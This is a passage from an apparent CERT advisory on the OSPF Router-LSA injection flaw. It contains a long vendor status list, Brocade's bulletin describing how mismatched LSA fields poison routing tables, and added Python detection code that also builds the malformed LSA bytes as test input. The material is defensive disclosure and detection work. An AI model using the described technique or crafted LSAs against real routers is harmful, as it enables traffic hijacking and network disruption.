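                      ip2int(router_id), 0, 0, autype) + b"\x00" * 8
    return hdr + body


# Null authentication, one consistent router-LSA and one whose fields disagree.
SAMPLE_UNAUTH = build_lsu("10.0.0.1", [build_router_lsa("10.0.0.1", "10.0.0.1"),
                                       build_router_lsa("10.0.0.9", "10.0.0.1")], 0)
# AuType 2: the same update on an interface configured for MD5 authentication.
SAMPLE_MD5 = build_lsu("10.0.0.1", [build_router_lsa("10.0.0.1", "10.0.0.1")], AUTYPE_CRYPTO)

if __name__ == "__main__":
    for name, pkt in (("unauthenticated", SAMPLE_UNAUTH), ("md5", SAMPLE_MD5)):
        print(name, inspect_lsu(pkt))
```

                                                                    A mismatch alone is a signal to investigate, not proof of injection; the Juniper statement's point is that a router accepting such LSAs without cryptographic authentication or an interface filter has no way to reject them, so the check is most useful on a span port or an IDS that sees OSPF traffic on interfaces where `crypto_auth` comes back false.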

                                                                    m0n0wall Unknown

                                                                    Notified:  May 28, 2013 Updated: May 28, 2013

                                                                    Status

                                                                    Unknown

                                                                    Vendor Statement

                                                                    No statement is currently available from the vendor regarding this vulnerability.

                                                                    Vendor References

                                                                      Mandriva S. A. Unknown

                                                                      Notified:  May 28, 2013 Updated: May 28, 2013

                                                                      Status

                                                                      Unknown

                                                                      Vendor Statement

                                                                      No statement is currently available from the vendor regarding this vulnerability.

                                                                      Vendor References

                                                                        McAfee Not Affected

                                                                        Notified:  May 28, 2013 Updated: October 16, 2013

                                                                        Status

                                                                        Not Affected

                                                                        Vendor Statement

                                                                        No statement is currently available from the vendor regarding this vulnerability.

                                                                        Vendor Information

                                                                        We are not aware of further vendor information regarding this vulnerability.

                                                                        Vendor References

                                                                        Mellanox Technologies Unknown

                                                                        Notified:  July 10, 2013 Updated: July 10, 2013

                                                                        Status

                                                                        Unknown

                                                                        Vendor Statement

                                                                        No statement is currently available from the vendor regarding this vulnerability.

                                                                        Vendor References

                                                                          Microsoft Corporation Unknown

                                                                          Notified:  May 28, 2013 Updated: May 28, 2013

                                                                          Status

                                                                          Unknown

                                                                          Vendor Statement

                                                                          No statement is currently available from the vendor regarding this vulnerability.

                                                                          Vendor References

                                                                            MontaVista Software, Inc. Unknown

                                                                            Notified:  May 28, 2013 Updated: May 28, 2013

                                                                            Status

                                                                            Unknown

                                                                            Vendor Statement

                                                                            No statement is currently available from the vendor regarding this vulnerability.

                                                                            Vendor References

                                                                              NEC Corporation Affected

                                                                              Notified:  May 28, 2013 Updated: September 10, 2013

                                                                              Status

                                                                              Affected

                                                                              Vendor Statement

                                                                              We provide information on this issue at the following URL: http://jpn.nec.com/security-info/secinfo/nv13-006.html (only in Japanese)

                                                                              Vendor Information

                                                                              We are not aware of further vendor information regarding this vulnerability.

                                                                              Vendor References

                                                                              NetApp Unknown

                                                                              Notified:  May 28, 2013 Updated: May 28, 2013

                                                                              Status

                                                                              Unknown

                                                                              Vendor Statement

                                                                              No statement is currently available from the vendor regarding this vulnerability.

                                                                              Vendor References

                                                                                NetBSD Unknown

                                                                                Notified:  May 28, 2013 Updated: May 28, 2013

                                                                                Status

                                                                                Unknown

                                                                                Vendor Statement

                                                                                No statement is currently available from the vendor regarding this vulnerability.

                                                                                Vendor References

                                                                                  netfilter Unknown

                                                                                  Notified:  May 28, 2013 Updated: May 28, 2013

                                                                                  Status

                                                                                  Unknown

                                                                                  Vendor Statement

                                                                                  No statement is currently available from the vendor regarding this vulnerability.

                                                                                  Vendor References

                                                                                    Nokia Unknown

                                                                                    Notified:  May 28, 2013 Updated: May 28, 2013

                                                                                    Status

                                                                                    Unknown

                                                                                    Vendor Statement

                                                                                    No statement is currently available from the vendor regarding this vulnerability.

                                                                                    Vendor References

                                                                                      Nortel Networks, Inc. Unknown

                                                                                      Notified:  May 10, 2013 Updated: May 10, 2013

                                                                                      Status

                                                                                      Unknown

                                                                                      Vendor Statement

                                                                                      No statement is currently available from the vendor regarding this vulnerability.

                                                                                      Vendor References

                                                                                        Novell, Inc. Unknown

                                                                                        Notified:  May 28, 2013 Updated: May 28, 2013

                                                                                        Status

                                                                                        Unknown

                                                                                        Vendor Statement

                                                                                        No statement is currently available from the vendor regarding this vulnerability.

                                                                                        Vendor References

                                                                                          OpenBSD Unknown

                                                                                          Notified:  May 28, 2013 Updated: May 28, 2013

                                                                                          Status

                                                                                          Unknown

                                                                                          Vendor Statement

                                                                                          No statement is currently available from the vendor regarding this vulnerability.

                                                                                          Vendor References

                                                                                            Openwall GNU/*/Linux Unknown

                                                                                            Notified:  May 28, 2013 Updated: May 28, 2013

                                                                                            Status

                                                                                            Unknown

                                                                                            Vendor Statement

                                                                                            No statement is currently available from the vendor regarding this vulnerability.

                                                                                            Vendor References

                                                                                              Oracle Corporation Affected

                                                                                              Notified:  May 28, 2013 Updated: October 16, 2013

                                                                                              Status

                                                                                              Affected

                                                                                              Vendor Statement

                                                                                              No statement is currently available from the vendor regarding this vulnerability.

                                                                                              Vendor Information

                                                                                              Affected products include: Oracle Sun Blade 6000 10GBE switched NEM 1.2, Sun Network 10GBE Switch 72P 1.2, Oracle Switch ES1-24 1.3. A patch is available at the following link.

                                                                                              Vendor References

                                                                                              Palo Alto Networks Not Affected

                                                                                              Notified:  May 28, 2013 Updated: July 18, 2013

                                                                                              Status

                                                                                              Not Affected

                                                                                              Vendor Statement

                                                                                              No statement is currently available from the vendor regarding this vulnerability.

                                                                                              Vendor Information

                                                                                              We are not aware of further vendor information regarding this vulnerability.

                                                                                              Peplink Unknown

                                                                                              Notified:  May 28, 2013 Updated: May 28, 2013

                                                                                              Status

                                                                                              Unknown

                                                                                              Vendor Statement

                                                                                              No statement is currently available from the vendor regarding this vulnerability.

                                                                                              Vendor References

                                                                                                Process Software Unknown

                                                                                                Notified:  May 28, 2013 Updated: May 28, 2013

                                                                                                Status

                                                                                                Unknown

                                                                                                Vendor Statement

                                                                                                No statement is currently available from the vendor regarding this vulnerability.

                                                                                                Vendor References

                                                                                                  Q1 Labs Unknown

                                                                                                  Notified:  May 28, 2013 Updated: May 28, 2013

                                                                                                  Status

                                                                                                  Unknown

                                                                                                  Vendor Statement

                                                                                                  No statement is currently available from the vendor regarding this vulnerability.

                                                                                                  Vendor References

                                                                                                    QLogic Unknown

                                                                                                    Notified:  July 17, 2013 Updated: July 17, 2013

                                                                                                    Status

                                                                                                    Unknown

                                                                                                    Vendor Statement

                                                                                                    No statement is currently available from the vendor regarding this vulnerability.

                                                                                                    Vendor References

                                                                                                      QNX Software Systems Inc. Unknown

                                                                                                      Notified:  June 06, 2013 Updated: June 06, 2013

                                                                                                      Status

                                                                                                      Unknown

                                                                                                      Vendor Statement

                                                                                                      No statement is currently available from the vendor regarding this vulnerability.

                                                                                                      Vendor References

                                                                                                        Quagga Not Affected

                                                                                                        Notified:  May 23, 2013 Updated: August 05, 2013

                                                                                                        Status

                                                                                                        Not Affected

                                                                                                        Vendor Statement

                                                                                                        No statement is currently available from the vendor regarding this vulnerability.

                                                                                                        Vendor Information

                                                                                                        We are not aware of further vendor information regarding this vulnerability.

                                                                                                        Addendum

                                                                                                        Quagga is not affected by this vulnerability but the vendor has provided a patch to prevent rebroadcasting of malformed LSAs.

                                                                                                        Red Hat, Inc. Unknown

                                                                                                        Notified:  May 28, 2013 Updated: May 28, 2013

                                                                                                        Status

                                                                                                        Unknown

                                                                                                        Vendor Statement

                                                                                                        No statement is currently available from the vendor regarding this vulnerability.

                                                                                                        Vendor References

                                                                                                          SafeNet Unknown

                                                                                                          Notified:  May 28, 2013 Updated: May 28, 2013

                                                                                                          Status

                                                                                                          Unknown

                                                                                                          Vendor Statement

                                                                                                          No statement is currently available from the vendor regarding this vulnerability.

                                                                                                          Vendor References

                                                                                                            Secureworx, Inc. Unknown

Notified: June 06, 2013 Updated: June 06, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Silicon Graphics, Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Slackware Linux Inc. Unknown

Notified: June 06, 2013 Updated: June 06, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

SmoothWall Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Snort Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Sony Corporation Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Sourcefire Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Stonesoft Unknown

Notified: June 06, 2013 Updated: June 06, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

SUSE Linux Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Symantec Unknown

Notified: June 06, 2013 Updated: June 06, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

The SCO Group Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

TippingPoint Technologies Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Turbolinux Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Ubuntu Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Unisys Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

VMware Not Affected

Notified: May 28, 2013 Updated: July 18, 2013

Status

Not Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vyatta Affected

Notified: May 10, 2013 Updated: August 05, 2013

Status

Affected

Vendor Statement
TECHNICAL SUPPORT BULLETIN
July 25, 2013
TSB 2013-165-A
SEVERITY: Low – Informational

PRODUCTS AFFECTED:
  Brocade MLX Series running NetIron SW
  Brocade NetIron XMR Series running NetIron SW
  Brocade NetIron CER Series running NetIron SW
  Brocade NetIron CES Series running NetIron SW
  Brocade VDX Series running Network OS 3.x and later SW
  Brocade FastIron Series running FastIron SW
  Brocade ICX Series running FastIron SW
  Brocade TurboIron Series running FastIron or TurboIron SW
  Brocade BigIron RX Series running BigIron RX SW
  Brocade ADX Series and JetCore Series running ServerIron SW
  Brocade Vyatta vRouter

CORRECTED IN RELEASE: See list of releases below.

BULLETIN OVERVIEW
A security vulnerability, US-CERT Ref VU#229804, has been identified in the OSPF protocol. This vulnerability has a CVSS score of 9.3 and is documented in the National Vulnerability Database as CVE-2013-0149. See http://nvd.nist.gov/home.cfm for details. Brocade produces and publishes Technical Support Bulletins to OEMs, partners and customers that have a direct, entitled, support relationship in place with Brocade. Please contact your primary service provider for further information regarding this topic and applicability for your environment.

PROBLEM STATEMENT
A security vulnerability, US-CERT Ref VU#229804, has been identified in the OSPF protocol. This vulnerability requires that the attacker already controls a router within the AS.

RISK ASSESSMENT
The listed products are exposed to this vulnerability in the OSPF protocol, where the attacker already has control of a router in the AS. This vulnerability has a CVSS score of 9.3.

SYMPTOMS
An attacker who has gained control of a router within a given AS can arbitrarily poison the routing tables of all other routers in the AS. This can facilitate traffic subversion, black hole, etc.
The attacker can cause attacks through a crafted illegal OSPF router LSA (type-1), where the link state ID and router ID in the LSA are not the same, leading to corruption of the routing table in the routers. The crafted Router LSA must come from a source IP of an OSPF peer; in other words, spoofing a legitimate OSPF peer. Or the router LSA is sent on an interface where an OSPF peer already exists.

WORKAROUND
There is no workaround. However, if users can physically secure their network/routers, the chance of this attack is quite low. The recommendations are:
  a) Physically secure the access to network routers, and links between routers.
  b) Only allow passive OSPF protocols on interfaces with user/host connections (i.e. leaf interfaces).
  c) Enable OSPF MD5 authentication. This is not considered completely secure, but it should make the attack more difficult.

CORRECTIVE ACTION
See http://My.Brocade.com for the appropriate SW release(s) as listed below; please contact your account team or Brocade Support if you have further questions.

Affected Products:
  Brocade MLX Series
  Brocade NetIron XMR Series
  Brocade NetIron CER Series
  Brocade NetIron CES Series
SW Releases with problem resolved:
  NetIron 05.2.00k and later
  NetIron 05.3.00f and later
  NetIron 05.4.00e and later
  NetIron 05.5.00d and later
Reference Defect ID: 468326

Affected Products:
  Brocade VDX Series
SW Releases with problem resolved:
  Network OS 3.0.1c and later
  Network OS 4.0.0a and later
Reference Defect ID: 466022

Affected Products:
  Brocade FastIron Series
  Brocade ICX Series
  Brocade TurboIron Series
SW Releases with problem resolved:
  FastIron 7.2.02k and later
  FastIron 7.3.00g and later
  FastIron 07.4.00d and later
  FastIron 08.0.00b and later
Reference Defect ID: 466801

Affected Products:
  Brocade BigIron RX Series
SW Releases with problem resolved:
  BigIron RX 2.7.02p and later
  BigIron RX 02.8.00f and later
  BigIron RX 02.9.00c and later
Reference Defect ID: 468497

Affected Products:
  Brocade ADX Series and JetCore Series
SW Releases with problem resolved:
  ServerIron JetCore 10.2.02d
  ServerIron JetCore 11.0.00k
  ServerIron ADX 12.3.01k
  ServerIron ADX 12.4.00k
  ServerIron ADX 12.5.01a
Reference Defect ID (ADX): 469347
Reference Defect ID (JetCore): 111372

Affected Products:
  Brocade Vyatta vRouter
For customers running on Amazon Web Services this problem has been resolved.
SW Releases with problem resolved:
  Brocade Vyatta vRouter 6.6R1

Vendor Information

We are not aware of further vendor information regarding this vulnerability.
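The Brocade bulletin above describes the malformed Router-LSA (type-1) whose Link State ID does not match its Advertising Router ID. The following is an added detection example, not Brocade's or CERT's code: it parses OSPFv2 LS Update bodies per RFC 2328 and flags Router-LSAs with that mismatch, so a capture or debug dump can be checked for it. The builder helpers and all sample bytes are constructed here for illustration; LSA checksums are not validated.

```python
import struct
from dataclasses import dataclass
from ipaddress import IPv4Address

# OSPFv2 LSA header (RFC 2328 A.4.1): 20 bytes, network byte order.
# age, options, type, Link State ID, Advertising Router, seq, checksum, length
LSA_HDR_FMT = "!HBBIIIHH"
LSA_HDR_LEN = struct.calcsize(LSA_HDR_FMT)
ROUTER_LSA = 1


@dataclass
class LsaHeader:
    ls_age: int
    options: int
    ls_type: int
    link_state_id: str       # dotted quad
    advertising_router: str  # dotted quad
    ls_seq: int
    checksum: int
    length: int              # header + body, in bytes


def parse_lsa_headers(data: bytes) -> list[LsaHeader]:
    """Walk back-to-back LSAs, using each length field to skip its body."""
    headers = []
    off = 0
    while off < len(data):
        if off + LSA_HDR_LEN > len(data):
            raise ValueError(f"truncated LSA header at offset {off}")
        f = struct.unpack_from(LSA_HDR_FMT, data, off)
        hdr = LsaHeader(f[0], f[1], f[2], str(IPv4Address(f[3])),
                        str(IPv4Address(f[4])), f[5], f[6], f[7])
        # Reject lengths that would loop forever or run past the buffer.
        if hdr.length < LSA_HDR_LEN or off + hdr.length > len(data):
            raise ValueError(f"LSA at offset {off} has bad length {hdr.length}")
        headers.append(hdr)
        off += hdr.length
    return headers


def parse_ls_update(body: bytes) -> list[LsaHeader]:
    """Parse an LS Update packet body: 4-byte LSA count, then the LSAs."""
    if len(body) < 4:
        raise ValueError("LS Update body too short")
    (count,) = struct.unpack_from("!I", body, 0)
    headers = parse_lsa_headers(body[4:])
    if len(headers) != count:
        raise ValueError(f"LS Update claims {count} LSAs, found {len(headers)}")
    return headers


def find_inconsistent_router_lsas(body: bytes) -> list[str]:
    """One warning per Router-LSA whose Link State ID differs from its
    Advertising Router; RFC 2328 requires both to be the originator's
    Router ID, and the bulletin's crafted LSA violates that."""
    warnings = []
    for h in parse_ls_update(body):
        if h.ls_type == ROUTER_LSA and h.link_state_id != h.advertising_router:
            warnings.append(
                f"Router-LSA seq 0x{h.ls_seq:08x}: Link State ID "
                f"{h.link_state_id} != Advertising Router {h.advertising_router}")
    return warnings


def build_router_lsa(link_state_id: str, advertising_router: str,
                     seq: int = 0x80000001) -> bytes:
    """Constructed test input: minimal Router-LSA with an empty link list
    (flags byte, pad byte, link count 0).  Checksum is left as zero."""
    body = struct.pack("!BBH", 0, 0, 0)
    hdr = struct.pack(LSA_HDR_FMT, 1, 0x02, ROUTER_LSA,
                      int(IPv4Address(link_state_id)),
                      int(IPv4Address(advertising_router)),
                      seq, 0, LSA_HDR_LEN + len(body))
    return hdr + body


def build_ls_update(lsas: list[bytes]) -> bytes:
    """Constructed LS Update body wrapping the given LSAs."""
    return struct.pack("!I", len(lsas)) + b"".join(lsas)


if __name__ == "__main__":
    update = build_ls_update([
        build_router_lsa("10.0.0.1", "10.0.0.1"),  # consistent
        build_router_lsa("10.0.0.2", "10.0.0.1"),  # mismatch, as in the bulletin
    ])
    for w in find_inconsistent_router_lsas(update):
        print("ALERT:", w)
```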

Watchguard Technologies, Inc. Not Affected

Notified: May 28, 2013 Updated: August 06, 2013

Status

Not Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Wind River Systems, Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Windstream Unknown

Notified: July 29, 2013 Updated: July 29, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Yamaha Corporation Affected

Notified: May 28, 2013 Updated: August 05, 2013

Status

Affected

Vendor Statement

Yamaha Corporation provides information on this issue at the following URL (Japanese only): http://www.rtpro.yamaha.co.jp/RT/FAQ/Security/VU96465452.html

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

ZyXEL Unknown

Notified: June 06, 2013 Updated: June 06, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References